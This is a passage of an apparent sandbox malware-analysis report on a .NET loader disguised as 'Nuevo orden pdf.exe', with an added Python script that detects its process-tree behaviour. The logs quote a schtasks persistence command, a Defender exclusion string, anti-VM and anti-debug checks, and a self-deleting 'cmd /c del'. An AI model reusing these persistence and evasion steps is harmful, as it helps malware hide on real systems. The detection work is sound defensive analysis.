            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\pYJofVrxAAcJK
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA401.tmp
            Source: Nuevo orden pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File read: C:\Users\user\Desktop\Nuevo orden pdf.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Nuevo orden pdf.exe 'C:\Users\user\Desktop\Nuevo orden pdf.exe'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Nuevo orden pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo orden pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Nuevo orden pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
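The process tree above is the behavioural skeleton of this sample: the .NET loader writes a task definition into %TEMP% and imports it with schtasks, starts RegSvcs.exe with no arguments as an injection host, and the payload, by then running inside explorer.exe, spawns cmmon32.exe, which deletes the original host binary. The following Python is an added example, not part of the Joe Sandbox report or of any detection product: it parses the report's own process-creation lines (constructed inline, accepted with or without a cell separator) and runs four process-tree rules over them. The watch-lists (which .NET framework binaries count as hollowing hosts, which explorer.exe children are unusual), the rule names and the assumption that an image path ends in ".exe" are mine to tune for your environment.

```python
import re

# Constructed sample: the process-creation events as the report lists them
# (Source = parent image, then the child image and its command line).
EVENTS = [
    r"Source: unknownProcess created: C:\Users\user\Desktop\Nuevo orden pdf.exe 'C:\Users\user\Desktop\Nuevo orden pdf.exe'",
    r"Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'",
    r"Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
    r"Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe",
    r"Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# Image path may contain spaces (as "Nuevo orden pdf.exe" does); assumed to end in ".exe".
EVENT_RE = re.compile(
    r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<image>.+?\.exe)(?=\s|$)\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
# Assumed watch-lists: .NET utilities commonly used as hollowing hosts, and the
# explorer.exe child seen in this report. Extend for your estate.
NET_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe", "aspnet_compiler.exe"}
UNUSUAL_EXPLORER_CHILDREN = {"cmmon32.exe"}


def basename(path):
    return path.strip("'\" ").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {"parent": m["parent"].strip(), "image": m["image"].strip(), "cmdline": m["cmdline"].strip()}


def rule_schtasks_xml_import(ev):
    """T1053.005: schtasks /Create importing a task XML from a user-writable directory."""
    if basename(ev["image"]) != "schtasks.exe":
        return None
    cl = ev["cmdline"].lower()
    m = re.search(r"/xml\s+['\"]?([^'\"]+)", cl)
    if "/create" in cl and m and any(p in m.group(1) for p in USER_WRITABLE):
        return f"schtasks imports task XML from {m.group(1).strip()}"
    return None


def rule_hollow_host(ev):
    """T1055.012 candidate: a .NET host started with no arguments by something under a user-writable path."""
    args = ev["cmdline"].strip("'\"")
    no_args = args == "" or args.lower() == ev["image"].lower()
    if basename(ev["image"]) in NET_HOSTS and no_args and any(p in ev["parent"].lower() for p in USER_WRITABLE):
        return f"{basename(ev['image'])} launched without arguments by {ev['parent']}"
    return None


def rule_explorer_spawn(ev):
    """Injected explorer.exe spawning a system binary the user never launches by hand."""
    if basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) in UNUSUAL_EXPLORER_CHILDREN:
        return f"explorer.exe spawned {basename(ev['image'])}"
    return None


def rule_self_delete(ev):
    """T1070.004: cmd /c del of a file under the Windows directory."""
    if basename(ev["image"]) != "cmd.exe":
        return None
    m = re.search(r"/c\s+del\s+['\"]?(?P<target>[^'\"]+)", ev["cmdline"], re.IGNORECASE)
    if m and m["target"].strip().lower().startswith("c:\\windows\\"):
        return f"cmd deletes {m['target'].strip()}"
    return None


RULES = {
    "schtasks_xml_import": rule_schtasks_xml_import,
    "hollow_host": rule_hollow_host,
    "explorer_spawn": rule_explorer_spawn,
    "self_delete": rule_self_delete,
}


def evaluate(lines):
    """[(rule_name, finding_text), ...] in event order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        for name, rule in RULES.items():
            hit = rule(ev)
            if hit:
                findings.append((name, hit))
    return findings


if __name__ == "__main__":
    for name, text in evaluate(EVENTS):
        print(f"[{name}] {text}")
```

The explorer.exe rule is the one that needs a watch-list, because explorer legitimately launches whatever the user double-clicks; the other three describe shapes that are rare in normal use regardless of the image involved (a task XML imported from a user-writable directory, a framework utility started with no arguments by something under C:\Users, and a cmd.exe deleting a file under C:\Windows).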
            Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
            Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.271818263.000000000100F000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.484481118.0000000004E5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
            Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
            Source: Nuevo orden pdf.exe | Static PE information: 0xEAA2096F [Tue Sep 28 04:49:51 2094 UTC]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D0E2 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D0EB push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D095 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D14C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00407924 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EA86 push cs; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00416C31 push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00417D4A pushfd ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041651B push ebp; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D0E2 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D0EB push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D095 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D14C push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E07924 push es; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1EA86 push cs; iretd
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E16C31 push ebp; iretd
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E17D4A pushfd ; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1651B push ebp; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.65919160699
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File created: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEA
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Nuevo orden pdf.exe PID: 5520, type: MEMORY
            Source: Yara match | File source: 0.2.Nuevo orden pdf.exe.2e5f580.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000000E098E4 second address: 0000000000E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000000E09B5E second address: 0000000000E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe TID: 5524 | Thread sleep time: -101318s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe TID: 5440 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5892 | Thread sleep count: 34 > 30
            Source: C:\Windows\explorer.exe TID: 5892 | Thread sleep time: -68000s >= -30000s
            Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6176 | Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Thread delayed: delay time: 101318
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000007.00000000.255308646.00000000088F9000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirJ
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: VMWARE
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000007.00000002.496346189.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000007.00000000.255419618.00000000089C6000.00000004.00000001.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&s
            Source: explorer.exe, 00000007.00000000.255419618.00000000089C6000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000007.00000000.254344674.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.257861112.000000000F584000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000002.496302001.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000007.00000000.254884318.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000007.00000000.242798162.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cmmon32.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409A90 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0040ACD0 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F158EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F590AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F19080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F93884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FD2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F30050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F2B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F97016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA41E8 mov eax, dword ptr fs:[00000030h]
